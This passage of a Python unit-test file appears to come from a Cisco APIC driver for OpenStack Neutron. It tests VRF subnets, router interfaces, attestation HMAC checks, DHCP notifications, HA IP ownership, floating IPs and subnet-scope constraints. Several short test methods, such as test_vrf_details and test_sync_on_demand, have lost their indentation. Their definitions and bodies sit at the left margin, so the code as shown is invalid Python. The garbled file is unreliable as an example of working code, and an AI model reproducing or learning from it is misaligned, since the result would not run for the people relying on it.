                context.get_admin_context(), router['id'],
                {'subnet_id': sub3['subnet']['id']})
            details = self._get_gbp_details(p1['id'], 'h1')
            if self.driver.per_tenant_context and vrf_per_router:
                # net2's subnets drop out of the router-scoped VRF
                self.assertEqual(['192.168.0.0/24', '192.168.2.0/24',
                                  '192.168.96.0/24', '192.168.98.0/24'],
                                 details['vrf_subnets'])
            else:
                self.assertEqual(['192.168.0.0/24', '192.168.2.0/24',
                                  '192.168.4.0/24', '192.168.6.0/24',
                                  '192.168.8.0/24', '192.168.96.0/24',
                                  '192.168.98.0/24'],
                                 details['vrf_subnets'])
        # Port on a network with no router interface
        with self.port(subnet=sub2, tenant_id=mocked.APIC_TENANT) as p2:
            p2 = p2['port']
            self._bind_port_to_host(p2['id'], 'h1')
            details = self._get_gbp_details(p2['id'], 'h1')
            if self.driver.per_tenant_context:
                self.assertEqual(mocked.APIC_TENANT,
                                 details['l3_policy_id'])
            else:
                self.assertEqual('%s-shared' % self._tenant(vrf=True),
                                 details['l3_policy_id'])
            self.assertEqual(self._tenant(vrf=True),
                             details['vrf_tenant'])
            self.assertEqual(self._network_vrf_name(),
                             details['vrf_name'])
            if self.driver.per_tenant_context and vrf_per_router:
                self.assertEqual(['192.168.4.0/24', '192.168.6.0/24',
                                  '192.168.8.0/24', '192.168.96.0/24',
                                  '192.168.98.0/24'],
                                 details['vrf_subnets'])
            else:
                self.assertEqual(['192.168.0.0/24', '192.168.2.0/24',
                                  '192.168.4.0/24', '192.168.6.0/24',
                                  '192.168.8.0/24', '192.168.96.0/24',
                                  '192.168.98.0/24'],
                                 details['vrf_subnets'])
def test_vrf_details(self):
self._test_vrf_details()
def test_vrf_details_vrf_per_router(self):
self.driver.vrf_per_router_tenants.append(mocked.APIC_TENANT)
self._test_vrf_details(vrf_per_router=True)
    def test_add_router_interface_on_shared_net_by_port(self):
        """Router interface by port-id on a shared network.

        The APIC add/remove_router_interface calls must be scoped to the
        network owner tenant ('onetenant'), even though the port belongs
        to 'anothertenant'.
        """
        net = self.create_network(
            tenant_id='onetenant', expected_res_status=201, shared=True,
            is_admin_context=True)['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4, is_admin_context=True)
        router = self.create_router(api=self.ext_api,
                                    expected_res_status=201)['router']
        with self.port(subnet=sub, tenant_id='anothertenant') as p1:
            self.mgr.add_router_interface = mock.Mock()
            self.l3_plugin.add_router_interface(
                context.get_admin_context(), router['id'],
                {'port_id': p1['port']['id']})
            self.mgr.add_router_interface.assert_called_once_with(
                self._tenant(neutron_tenant='onetenant'),
                self._scoped_name(
                    router['id'], tenant=TEST_TENANT), net['id'],
                app_profile_name=self._app_profile(neutron_tenant='onetenant'))
            self.mgr.remove_router_interface = mock.Mock()
            # Test removal
            self.l3_plugin.remove_router_interface(
                context.get_admin_context(), router['id'],
                {'port_id': p1['port']['id']})
            self.mgr.remove_router_interface.assert_called_once_with(
                self._tenant(neutron_tenant='onetenant'),
                self._scoped_name(router['id'], tenant=TEST_TENANT), net['id'],
                app_profile_name=self._app_profile(neutron_tenant='onetenant'))
    def test_add_router_interface_on_shared_net_by_subnet(self):
        """Router interface by subnet-id on a shared network.

        Same scoping expectation as the by-port variant: APIC calls use
        the network owner tenant ('onetenant') although the subnet was
        created for 'anothertenant'.
        """
        net = self.create_network(
            tenant_id='onetenant', expected_res_status=201, shared=True,
            is_admin_context=True)['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4, is_admin_context=True,
            tenant_id='anothertenant')['subnet']
        router = self.create_router(api=self.ext_api,
                                    expected_res_status=201)['router']
        self.mgr.add_router_interface = mock.Mock()
        self.l3_plugin.add_router_interface(
            context.get_admin_context(), router['id'],
            {'subnet_id': sub['id']})
        self.mgr.add_router_interface.assert_called_once_with(
            self._tenant(neutron_tenant='onetenant'),
            self._scoped_name(router['id'], tenant=TEST_TENANT), net['id'],
            app_profile_name=self._app_profile(neutron_tenant='onetenant'))
        self.mgr.remove_router_interface = mock.Mock()
        # Test removal
        self.l3_plugin.remove_router_interface(
            context.get_admin_context(), router['id'],
            {'subnet_id': sub['id']})
        self.mgr.remove_router_interface.assert_called_once_with(
            self._tenant(neutron_tenant='onetenant'),
            self._scoped_name(router['id'], tenant=TEST_TENANT), net['id'],
            app_profile_name=self._app_profile(neutron_tenant='onetenant'))
def test_sync_on_demand(self):
self.synchronizer.reset_mock()
self.create_network(name=acst.APIC_SYNC_NETWORK, is_admin_context=True)
self.assertTrue(self.synchronizer._sync_base.called)
def test_sync_on_demand_no_admin(self):
self.synchronizer.reset_mock()
self.create_network(name=acst.APIC_SYNC_NETWORK)
self.assertFalse(self.synchronizer._sync_base.called)
def test_sync_on_demand_not(self):
self.synchronizer.reset_mock()
self.create_network(name='some_name', is_admin_context=True,
expected_res_status=201)
self.assertFalse(self.synchronizer._sync_base.called)
    def test_attestation(self):
        """Verify the attestation blob attached to gbp_details.

        The attestation is a base64-encoded JSON document describing the
        switch/port and EPG of the endpoint, accompanied by an HMAC-SHA256
        ('validator-mac') computed over the raw JSON with a shared secret.
        """
        self._register_agent('h1')
        net = self.create_network(
            tenant_id='onetenant', expected_res_status=201)['network']
        expected_attestation = {'ports': [{'switch': '102',
                                           'port': 'eth4/23'}],
                                'policy-space-name': self._tenant(
                                    neutron_tenant='onetenant'),
                                'endpoint-group-name': (
                                    self._app_profile(
                                        neutron_tenant='onetenant') + '|' +
                                    net['id'])}
        sub = self.create_subnet(
            tenant_id='onetenant', network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4)
        self.driver.apic_manager.get_switch_and_port_for_host = mock.Mock(
            return_value=[('102', 'eth4/23')])
        with self.port(subnet=sub, tenant_id='onetenant') as p1:
            p1 = p1['port']
            self._bind_port_to_host(p1['id'], 'h1')
            self.driver._add_ip_mapping_details = mock.Mock()
            # Mock switch, module and port for host
            details = self._get_gbp_details(p1['id'], 'h1')
            # Test attestation exists
            self.assertTrue('attestation' in details)
            self.assertEqual(1, len(details['attestation']))
            observed_attestation = base64.b64decode(
                details['attestation'][0]['validator'])
            # It's a json string
            observed_attestation_copy = observed_attestation
            # Unmarshal
            observed_attestation = json.loads(observed_attestation)
            # timestamp/validity vary per run, so drop them before comparing
            del observed_attestation['timestamp']
            del observed_attestation['validity']
            self.assertEqual(expected_attestation, observed_attestation)
            self.assertEqual(details['attestation'][0]['name'], p1['id'])
            # Validate decrypting
            observed_mac = base64.b64decode(
                details['attestation'][0]['validator-mac'])
            # NOTE(review): str key/msg only works on Python 2; Python 3
            # hmac requires bytes — confirm the target interpreter.
            expected_mac = hmac.new(
                'dirtylittlesecret', msg=observed_attestation_copy,
                digestmod=hashlib.sha256).digest()
            # Validation succeeded
            self.assertEqual(expected_mac, observed_mac)
    def test_dhcp_notifications_on_create(self):
        """Creating a DHCP port notifies all bound ports on its subnet.

        Both pre-existing bound ports must receive a port_update
        notification when the DHCP port is created.
        """
        self._register_agent('h1')
        net = self.create_network(
            expected_res_status=201, shared=True,
            is_admin_context=True)['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4, is_admin_context=True)
        with self.port(subnet=sub) as p1:
            self._bind_port_to_host(p1['port']['id'], 'h1')
            with self.port(subnet=sub) as p2:
                self._bind_port_to_host(p2['port']['id'], 'h1')
                # Only count notifications caused by the DHCP port creation
                self.driver.notifier.reset_mock()
                with self.port(subnet=sub, device_owner="network:dhcp"):
                    self.assertEqual(
                        2, self.driver.notifier.port_update.call_count)
                    p1 = self.show_port(p1['port']['id'],
                                        is_admin_context=True)['port']
                    p2 = self.show_port(p2['port']['id'],
                                        is_admin_context=True)['port']
                    expected_calls = [
                        mock.call(mock.ANY, p1),
                        mock.call(mock.ANY, p2)]
                    self._check_call_list(
                        expected_calls,
                        self.driver.notifier.port_update.call_args_list)
    def test_dhcp_notifications_on_update(self):
        """Updating a DHCP port's subnet notifies ports on both subnets.

        Creating the DHCP port on sub notifies only sub's port; moving it
        to sub2 then notifies ports on both the old and the new subnet.
        """
        self._register_agent('h1')
        net = self.create_network(
            expected_res_status=201, shared=True,
            is_admin_context=True)['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4, is_admin_context=True)
        sub2 = self.create_subnet(
            network_id=net['id'], cidr='192.168.1.0/24',
            ip_version=4, is_admin_context=True)
        with self.port(subnet=sub) as p1:
            # Force port on a specific subnet
            self.update_port(
                p1['port']['id'],
                fixed_ips=[{'subnet_id': sub['subnet']['id']}],
                is_admin_context=True)
            self._bind_port_to_host(p1['port']['id'], 'h1')
            with self.port(subnet=sub2) as p2:
                # Force port on a specific subnet
                self.update_port(
                    p2['port']['id'],
                    fixed_ips=[{'subnet_id': sub2['subnet']['id']}],
                    is_admin_context=True)
                self._bind_port_to_host(p2['port']['id'], 'h1')
                self.driver.notifier.port_update.reset_mock()
                with self.port(subnet=sub, device_owner="network:dhcp") as p3:
                    # Only sub 1 notifies
                    self.assertEqual(
                        1, self.driver.notifier.port_update.call_count)
                    # Force port on a specific subnet
                    self.update_port(
                        p3['port']['id'],
                        fixed_ips=[{'subnet_id': sub['subnet']['id']}],
                        is_admin_context=True)
                    self.driver.notifier.port_update.reset_mock()
                    # Switch DHCP port to sub2
                    self.update_port(
                        p3['port']['id'],
                        fixed_ips=[{'subnet_id': sub2['subnet']['id']}],
                        is_admin_context=True)
                    self.assertEqual(
                        2, self.driver.notifier.port_update.call_count)
                    p1 = self.show_port(p1['port']['id'],
                                        is_admin_context=True)['port']
                    p2 = self.show_port(p2['port']['id'],
                                        is_admin_context=True)['port']
                    expected_calls = [
                        mock.call(mock.ANY, p1),
                        mock.call(mock.ANY, p2)]
                    self._check_call_list(
                        expected_calls,
                        self.driver.notifier.port_update.call_args_list)
    def test_overlapping_ip_ownership(self):
        """HA IP ownership with the same IP on two different networks.

        Two ports in different networks share the address 192.168.0.4;
        claiming ownership for one must not disturb the other's DB entry,
        and exactly one HA-IP row per port must exist.
        """
        ha_handler = ha.HAIPOwnerDbMixin()
        net1 = self.create_network(
            tenant_id='onetenant', expected_res_status=201, shared=True,
            is_admin_context=True)['network']
        sub1 = self.create_subnet(
            network_id=net1['id'], cidr='192.168.0.0/24',
            ip_version=4, is_admin_context=True)
        # Create another network with the same subnet
        net2 = self.create_network(
            tenant_id='onetenant', expected_res_status=201, shared=True,
            is_admin_context=True)['network']
        sub2 = self.create_subnet(
            network_id=net2['id'], cidr='192.168.0.0/24',
            ip_version=4, is_admin_context=True)
        # Create 2 ports in each subnet, with the same IP address
        with self.port(subnet=sub1, fixed_ips=[{'ip_address':
                                                '192.168.0.4'}]) as p1:
            with self.port(subnet=sub2, fixed_ips=[{'ip_address':
                                                    '192.168.0.4'}]) as p2:
                p1 = p1['port']
                p2 = p2['port']
                # Verify the two IPs are the same
                self.assertEqual([x['ip_address'] for x in p1['fixed_ips']],
                                 [x['ip_address'] for x in p2['fixed_ips']])
                # Set P1 as owner
                ha_handler.update_ip_owner(
                    {'port': p1['id'], 'ip_address_v4': '192.168.0.4'})
                # Ownership is set in the DB for P1
                own_p1 = ha_handler.ha_ip_handler.get_ha_ipaddresses_for_port(
                    p1['id'])
                self.assertEqual(['192.168.0.4'], own_p1)
                # Set P2 as owner
                ha_handler.update_ip_owner(
                    {'port': p2['id'], 'ip_address_v4': '192.168.0.4'})
                # Ownership is set in the DB for P2
                own_p2 = ha_handler.ha_ip_handler.get_ha_ipaddresses_for_port(
                    p2['id'])
                self.assertEqual(['192.168.0.4'], own_p2)
                # P1 is still there
                own_p1 = ha_handler.ha_ip_handler.get_ha_ipaddresses_for_port(
                    p1['id'])
                self.assertEqual(['192.168.0.4'], own_p1)
                # Verify number of entries is exactly 2
                session = db_api.get_session()
                entries = session.query(
                    ha.HAIPAddressToPortAssocation).all()
                self.assertEqual(2, len(entries))
    def test_ip_address_owner_update(self):
        """IP ownership can be set and then moved between ports.

        Each ownership change must update the HA-IP DB mapping and send a
        port_update notification for the affected port(s).
        """
        net = self.create_network(
            tenant_id=mocked.APIC_TENANT, expected_res_status=201)['network']
        self.create_subnet(
            tenant_id=mocked.APIC_TENANT,
            network_id=net['id'], cidr='10.0.0.0/24', ip_version=4)['subnet']
        p1 = self.create_port(
            network_id=net['id'], tenant_id=mocked.APIC_TENANT,
            device_owner='compute:', device_id='someid')['port']
        p2 = self.create_port(
            network_id=net['id'], tenant_id=mocked.APIC_TENANT,
            device_owner='compute:', device_id='someid')['port']
        ip_owner_info = {'port': p1['id'], 'ip_address_v4': '1.2.3.4'}
        self.driver.notify_port_update = mock.Mock()
        # set new owner
        self.driver.ip_address_owner_update(
            context.get_admin_context(),
            ip_owner_info=ip_owner_info, host='h1')
        obj = self.driver.ha_ip_handler.get_port_for_ha_ipaddress(
            '1.2.3.4', net['id'])
        self.assertEqual(p1['id'], obj['port_id'])
        self.driver.notify_port_update.assert_called_with(p1['id'])
        # update existing owner
        self.driver.notify_port_update.reset_mock()
        ip_owner_info['port'] = p2['id']
        self.driver.ip_address_owner_update(
            context.get_admin_context(),
            ip_owner_info=ip_owner_info, host='h2')
        obj = self.driver.ha_ip_handler.get_port_for_ha_ipaddress(
            '1.2.3.4', net['id'])
        self.assertEqual(p2['id'], obj['port_id'])
        # Moving ownership notifies both the old and the new owner port
        exp_calls = [
            mock.call(p1['id']),
            mock.call(p2['id'])]
        self._check_call_list(
            exp_calls, self.driver.notify_port_update.call_args_list)
    def test_gbp_details_for_allowed_address_pair(self):
        """gbp_details for ports sharing allowed-address-pairs.

        Two ports carry the same allowed-address-pairs; each port's
        details must mark only the address it owns as 'active'. When the
        allowed addresses are fixed IPs of other ports with floating IPs,
        the FIPs must be reported against the owning ports instead, and
        FIP updates must fan out to all related ports.
        """
        self._register_agent('h1')
        self._register_agent('h2')
        net = self.create_network(
            tenant_id=mocked.APIC_TENANT, expected_res_status=201)['network']
        sub1 = self.create_subnet(
            tenant_id=mocked.APIC_TENANT,
            network_id=net['id'], cidr='10.0.0.0/24', ip_version=4)['subnet']
        sub2 = self.create_subnet(
            tenant_id=mocked.APIC_TENANT,
            network_id=net['id'], cidr='1.2.3.0/24', ip_version=4)['subnet']
        allow_addr = [{'ip_address': '1.2.3.250',
                       'mac_address': '00:00:00:AA:AA:AA'},
                      {'ip_address': '1.2.3.251',
                       'mac_address': '00:00:00:BB:BB:BB'}]
        # create 2 ports with same allowed-addresses
        p1 = self.create_port(
            network_id=net['id'], tenant_id=mocked.APIC_TENANT,
            device_owner='compute:', device_id='someid',
            fixed_ips=[{'subnet_id': sub1['id']}],
            allowed_address_pairs=allow_addr)['port']
        p2 = self.create_port(
            network_id=net['id'], tenant_id=mocked.APIC_TENANT,
            device_owner='compute:', device_id='someid',
            fixed_ips=[{'subnet_id': sub1['id']}],
            allowed_address_pairs=allow_addr)['port']
        self._bind_port_to_host(p1['id'], 'h1')
        self._bind_port_to_host(p2['id'], 'h2')
        # Each port owns one of the two shared addresses
        self.driver.ha_ip_handler.set_port_id_for_ha_ipaddress(
            p1['id'], '1.2.3.250')
        self.driver.ha_ip_handler.set_port_id_for_ha_ipaddress(
            p2['id'], '1.2.3.251')
        allow_addr[0]['active'] = True
        details = self._get_gbp_details(p1['id'], 'h1')
        self.assertEqual(allow_addr, details['allowed_address_pairs'])
        del allow_addr[0]['active']
        allow_addr[1]['active'] = True
        details = self._get_gbp_details(p2['id'], 'h2')
        self.assertEqual(allow_addr, details['allowed_address_pairs'])
        # set allowed-address as fixed-IP of ports p3 and p4, which also have
        # floating-IPs. Verify that FIP is "stolen" by p1 and p2
        net_ext = self.create_network(
            is_admin_context=True, tenant_id=mocked.APIC_TENANT,
            **{'router:external': 'True'})['network']
        self.create_subnet(
            is_admin_context=True, tenant_id=mocked.APIC_TENANT,
            network_id=net_ext['id'], cidr='8.8.8.0/24',
            ip_version=4)['subnet']
        p3 = self.create_port(
            network_id=net['id'], tenant_id=mocked.APIC_TENANT,
            fixed_ips=[{'subnet_id': sub2['id'],
                        'ip_address': '1.2.3.250'}])['port']
        p4 = self.create_port(
            network_id=net['id'], tenant_id=mocked.APIC_TENANT,
            fixed_ips=[{'subnet_id': sub2['id'],
                        'ip_address': '1.2.3.251'}])['port']
        rtr = self.create_router(
            api=self.ext_api, tenant_id=mocked.APIC_TENANT,
            external_gateway_info={'network_id': net_ext['id']})['router']
        self.l3_plugin.add_router_interface(
            context.get_admin_context(), rtr['id'], {'subnet_id': sub2['id']})
        fip1 = self.create_floatingip(
            tenant_id=mocked.APIC_TENANT, port_id=p3['id'],
            floating_network_id=net_ext['id'],
            api=self.ext_api)['floatingip']
        fip2 = self.create_floatingip(
            tenant_id=mocked.APIC_TENANT, port_id=p4['id'],
            floating_network_id=net_ext['id'],
            api=self.ext_api)['floatingip']
        details = self._get_gbp_details(p1['id'], 'h1')
        self.assertEqual(1, len(details['floating_ip']))
        self.assertEqual(
            fip1['floating_ip_address'],
            details['floating_ip'][0]['floating_ip_address'])
        details = self._get_gbp_details(p2['id'], 'h2')
        self.assertEqual(1, len(details['floating_ip']))
        self.assertEqual(
            fip2['floating_ip_address'],
            details['floating_ip'][0]['floating_ip_address'])
        # verify FIP updates: update to p3, p4 should also update p1 and p2
        self.driver.notify_port_update = mock.Mock()
        self.driver.notify_port_update_for_fip(p3['id'])
        expected_calls = [
            mock.call(p, mock.ANY)
            for p in sorted([p1['id'], p2['id'], p3['id']])]
        self._check_call_list(
            expected_calls, self.driver.notify_port_update.call_args_list)
        self.driver.notify_port_update.reset_mock()
        self.driver.notify_port_update_for_fip(p4['id'])
        expected_calls = [
            mock.call(p, mock.ANY)
            for p in sorted([p1['id'], p2['id'], p4['id']])]
        self._check_call_list(
            expected_calls, self.driver.notify_port_update.call_args_list)
    def test_gbp_details_for_route_leak_network(self):
        """gbp_details for a port on an allow_route_leak network.

        With per-tenant context and VRF-per-router enabled, a port on a
        leaked network attached to two routers is reported with one
        'Leak-<router>-<network>' NAT EPG entry per router; the router
        that only reuses another's routing context adds no entry.
        """
        self.driver.per_tenant_context = True
        self.driver.vrf_per_router_tenants.append(mocked.APIC_TENANT)
        self._register_agent('h1')
        net_route_leak = self.create_network(
            tenant_id=mocked.APIC_TENANT, expected_res_status=201,
            **{'apic:allow_route_leak': 'True'})['network']
        sub_route_leak = self.create_subnet(
            tenant_id=mocked.APIC_TENANT,
            network_id=net_route_leak['id'], cidr='10.0.0.0/24',
            ip_version=4)['subnet']
        rtr1 = self.create_router(
            api=self.ext_api, tenant_id=mocked.APIC_TENANT)['router']
        self.l3_plugin.add_router_interface(
            context.get_admin_context(), rtr1['id'],
            {'subnet_id': sub_route_leak['id']})
        p1 = self.create_port(
            network_id=net_route_leak['id'], tenant_id=mocked.APIC_TENANT,
            device_owner='compute:', device_id='someid',
            fixed_ips=[{'subnet_id': sub_route_leak['id'],
                        'ip_address': '10.0.0.10'}])['port']
        self._bind_port_to_host(p1['id'], 'h1')
        # Second router attached by an explicit router-interface port
        rtr2 = self.create_router(
            api=self.ext_api, tenant_id=mocked.APIC_TENANT)['router']
        p2 = self.create_port(
            network_id=net_route_leak['id'], tenant_id=mocked.APIC_TENANT,
            device_owner='network:router_interface',
            fixed_ips=[{'subnet_id': sub_route_leak['id'],
                        'ip_address': '10.0.0.2'}])['port']
        self.l3_plugin.add_router_interface(
            context.get_admin_context(), rtr2['id'],
            {'port_id': p2['id']})
        # use_routing_context router
        rtr3 = self.create_router(
            api=self.ext_api, tenant_id=mocked.APIC_TENANT,
            **{'apic:use_routing_context': rtr1['id']})['router']
        p3 = self.create_port(
            network_id=net_route_leak['id'], tenant_id=mocked.APIC_TENANT,
            device_owner='network:router_interface',
            fixed_ips=[{'subnet_id': sub_route_leak['id'],
                        'ip_address': '10.0.0.3'}])['port']
        self.l3_plugin.add_router_interface(
            context.get_admin_context(), rtr3['id'],
            {'port_id': p3['id']})
        details = self._get_gbp_details(p1['id'], 'h1')
        # One leak entry per routing context (rtr1 and rtr2, not rtr3)
        self.assertEqual(2, len(details['floating_ip']))
        self.assertEqual('10.0.0.10',
                         details['floating_ip'][0]['fixed_ip_address'])
        self.assertEqual('10.0.0.10',
                         details['floating_ip'][0]['floating_ip_address'])
        self.assertEqual(self._tenant(),
                         details['floating_ip'][0]['nat_epg_tenant'])
        self.assertEqual(self._app_profile(),
                         details['floating_ip'][0]['nat_epg_app_profile'])
        leak_epg_name = 'Leak-%s-%s' % (rtr1['id'],
                                        net_route_leak['id'])
        self.assertEqual(leak_epg_name,
                         details['floating_ip'][0]['nat_epg_name'])
        self.assertEqual('10.0.0.10',
                         details['floating_ip'][1]['fixed_ip_address'])
        self.assertEqual('10.0.0.10',
                         details['floating_ip'][1]['floating_ip_address'])
        self.assertEqual(self._tenant(),
                         details['floating_ip'][1]['nat_epg_tenant'])
        self.assertEqual(self._app_profile(),
                         details['floating_ip'][1]['nat_epg_app_profile'])
        leak_epg_name = 'Leak-%s-%s' % (rtr2['id'],
                                        net_route_leak['id'])
        self.assertEqual(leak_epg_name,
                         details['floating_ip'][1]['nat_epg_name'])
    def test_notify_router_interface_update(self):
        """Router-interface updates notify ports on the same subnet.

        With per-tenant context, an inter-tenant router interface is
        rejected; otherwise it is added. In both cases a router update
        must produce exactly one port_update for the other bound port.
        """
        exc = driver.InterTenantRouterInterfaceNotAllowedOnPerTenantContext
        net = self.create_network(
            tenant_id='onetenant', expected_res_status=201, shared=True,
            is_admin_context=True)['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4, is_admin_context=True)
        router = self.create_router(api=self.ext_api,
                                    expected_res_status=201)['router']
        self._register_agent('h1')
        with self.port(subnet=sub, tenant_id='anothertenant',
                       device_owner='network:router_interface') as p1:
            with self.port(subnet=sub, tenant_id='anothertenant') as p2:
                self._bind_port_to_host(p2['port']['id'], 'h1')
                self.mgr.add_router_interface = mock.Mock()
                if self.driver.per_tenant_context:
                    self.assertRaises(
                        exc,
                        self.l3_plugin.add_router_interface,
                        context.get_admin_context(),
                        router['id'], {'port_id': p1['port']['id']}
                    )
                else:
                    self.l3_plugin.add_router_interface(
                        context.get_admin_context(), router['id'],
                        {'port_id': p1['port']['id']})
                self.assertEqual(n_constants.DEVICE_OWNER_ROUTER_INTF,
                                 p1['port']['device_owner'])
                self.driver.notifier.port_update = mock.Mock()
                self.driver._notify_ports_due_to_router_update(p1['port'])
                # Only the bound non-router port (p2) gets notified
                self.assertEqual(
                    1, self.driver.notifier.port_update.call_count)
                self.assertEqual(
                    p2['port']['id'],
                    self.driver.notifier.port_update.call_args_list[
                        0][0][1]['id'])
def test_create_reserved_name(self):
net = self.create_network(
tenant_id='onetenant', name=acst.APIC_SYNC_NETWORK,
expected_res_status=201)
self.assertEqual({}, net['network'])
# Net shouldn't exist
nets = self.driver.db_plugin.get_networks(
context.get_admin_context(),
filters={'name': [acst.APIC_SYNC_NETWORK]})
self.assertEqual(0, len(nets))
    def test_request_endpoint_details(self):
        """request_endpoint_details returns both gbp and neutron details.

        The gbp_details part must match what _get_gbp_details reports
        (attestation aside, which carries a per-call timestamp).
        """
        net = self.create_network(expected_res_status=201)['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4)
        self._register_agent('h1')
        with self.port(subnet=sub) as p1:
            p1 = p1['port']
            self.assertEqual(net['id'], p1['network_id'])
            # Bind port to trigger path binding
            self._bind_port_to_host(p1['id'], 'h1')
            self.driver._add_ip_mapping_details = mock.Mock()
            details = self._get_gbp_details(p1['id'], 'h1')
            request = self._request_endpoint_details(p1['id'], 'h1')
            # Attestation includes a timestamp, so it cannot be compared
            details.pop('attestation', None)
            request['gbp_details'].pop('attestation', None)
            self.assertEqual(details, request['gbp_details'])
            self.assertEqual(p1['id'], request['neutron_details']['port_id'])
def test_request_endpoint_details_not_found(self):
self.driver._add_ip_mapping_details = mock.Mock()
request = self._request_endpoint_details('randomid', 'h1')
# Port not found
self.assertEqual({'device': 'tap%s' % 'randomid'},
request['gbp_details'])
self.assertTrue('port_id' not in request['neutron_details'])
    def test_request_endpoint_details_exception(self):
        """An internal exception makes request_endpoint_details return None."""
        net = self.create_network(expected_res_status=201)['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4)
        self._register_agent('h1')
        with self.port(subnet=sub) as p1:
            p1 = p1['port']
            self.assertEqual(net['id'], p1['network_id'])
            # Bind port to trigger path binding
            self._bind_port_to_host(p1['id'], 'h1')
            # Force a failure inside details building
            self.driver._add_ip_mapping_details = mock.Mock(
                side_effect=Exception)
            request = self._request_endpoint_details(p1['id'], 'h1')
            self.assertIsNone(request)
    def test_snat_port_ip_loss(self):
        """A SNAT pool port that lost its fixed IPs gets replaced.

        After clearing the host SNAT port's fixed_ips, the next
        gbp_details request must still report one host_snat_ip, served by
        a freshly created SNAT port (different ID, still one per host).
        """
        self._register_agent('h1')
        admin_ctx = context.get_admin_context()
        self._mock_external_dict([('supported', '192.168.0.2/24')])
        self.driver.apic_manager.ext_net_dict[
            'supported']['host_pool_cidr'] = '192.168.200.1/24'
        # Create external network
        net_ext = self.create_network(
            is_admin_context=True, tenant_id=mocked.APIC_TENANT,
            name='supported',
            **{'router:external': 'True'})['network']
        self.create_subnet(
            is_admin_context=True, tenant_id=mocked.APIC_TENANT,
            network_id=net_ext['id'], cidr='8.8.8.0/24',
            ip_version=4)
        # Create internal network
        net = self.create_network(
            tenant_id=mocked.APIC_TENANT, expected_res_status=201)['network']
        sub = self.create_subnet(
            tenant_id=mocked.APIC_TENANT,
            network_id=net['id'], cidr='10.0.0.0/24', ip_version=4)['subnet']
        # Attach router to them
        rtr = self.create_router(
            api=self.ext_api, tenant_id=mocked.APIC_TENANT,
            external_gateway_info={'network_id': net_ext['id']})['router']
        self.l3_plugin.add_router_interface(
            context.get_admin_context(), rtr['id'], {'subnet_id': sub['id']})
        # Create port on internal subnet
        p = self.create_port(
            network_id=net['id'], tenant_id=mocked.APIC_TENANT,
            device_owner='compute:', device_id='someid',
            fixed_ips=[{'subnet_id': sub['id']}])['port']
        self._bind_port_to_host(p['id'], 'h1')
        # Request gbp details
        mapping = self._get_gbp_details(p['id'], 'h1')
        self.assertEqual(1, len(mapping['host_snat_ips']))
        snat_ports = self.driver.db_plugin.get_ports(
            admin_ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                                'device_id': ['h1']})
        # Delete Fixed IPs
        self.driver.db_plugin.update_port(
            admin_ctx, snat_ports[0]['id'], {'port': {'fixed_ips': []}})
        # Re run
        mapping = self._get_gbp_details(p['id'], 'h1')
        self.assertEqual(1, len(mapping['host_snat_ips']))
        snat_ports_2 = self.driver.db_plugin.get_ports(
            admin_ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                                'device_id': ['h1']})
        self.assertEqual(1, len(snat_ports))
        self.assertEqual(1, len(snat_ports_2))
        # The broken SNAT port was replaced, not reused
        self.assertNotEqual(snat_ports[0]['id'], snat_ports_2[0]['id'])
class TestCiscoApicML2SubnetScope(ApicML2IntegratedTestCase):
    """Tests for subnet scope constraints loaded from a constraints file."""

    def setUp(self, service_plugins=None):
        # Point the ml2_cisco_apic network_constraints_filename option at a
        # temp file before the base setUp initializes the driver.
        with tempfile.NamedTemporaryFile(delete=False) as fd:
            self.cons_file_name = fd.name
        self.override_conf('network_constraints_filename',
                           self.cons_file_name,
                           'ml2_cisco_apic')
        super(TestCiscoApicML2SubnetScope, self).setUp(service_plugins)

    def test_subnet_scope(self):
        """Subnets get the scope from constraints; denied CIDRs fail.

        net1's constraints map CIDRs to public/private with a deny list
        and a default scope; net2 has no section, so the DEFAULT
        (subnet_scope = deny) applies to everything.
        """
        cons_data = """
[DEFAULT]
subnet_scope = deny
[%s/net1]
public = 10.10.10.1/24,10.10.20.1/24
private = 20.10.10.0/28,20.10.20.0/24
deny = 30.10.10.0/24
default = private
""" % (mocked.APIC_TENANT)
        # Force the constraints source to re-read the file we just wrote
        self.driver.net_cons.source.last_refresh_time = 0
        with open(self.cons_file_name, 'w') as fd:
            fd.write(cons_data)
        self.mgr.ensure_subnet_created_on_apic = mock.Mock()
        self.driver.name_mapper.aci_mapper.min_suffix = 0
        net1 = self.create_network(
            name='net1', tenant_id=mocked.APIC_TENANT,
            expected_res_status=201)['network']
        net2 = self.create_network(
            name='net2', tenant_id=mocked.APIC_TENANT,
            expected_res_status=201)['network']
        for cidr in ['10.10.10.0/28', '20.10.10.0/26', '40.10.10.0/30']:
            self.create_subnet(
                tenant_id=mocked.APIC_TENANT,
                network_id=net1['id'], cidr=cidr, ip_version=4)
        # Scopes: matched public, matched private, unmatched -> default
        exp_calls = [
            mock.call(
                self._tenant(), self._scoped_name('net1'),
                '10.10.10.1/28', scope='public'),
            mock.call(
                self._tenant(), self._scoped_name('net1'),
                '20.10.10.1/26', scope='private'),
            mock.call(
                self._tenant(), self._scoped_name('net1'),
                '40.10.10.1/30', scope='private')]
        self._check_call_list(
            exp_calls, self.mgr.ensure_subnet_created_on_apic.call_args_list)
        # Explicitly denied CIDR on net1
        res = self.create_subnet(
            tenant_id=mocked.APIC_TENANT,
            network_id=net1['id'], cidr='30.10.10.0/24', ip_version=4,
            expected_res_status=500)
        self.assertEqual('HTTPInternalServerError',
                         res['NeutronError']['type'])
        # net2 falls back to DEFAULT (deny)
        res = self.create_subnet(
            tenant_id=mocked.APIC_TENANT,
            network_id=net2['id'], cidr='10.10.10.0/24', ip_version=4,
            expected_res_status=500)
        self.assertEqual('HTTPInternalServerError',
                         res['NeutronError']['type'])
class MechanismRpcTestCase(ApicML2IntegratedTestBase):
    """Tests for the APIC topology RPC callback (host-link updates)."""

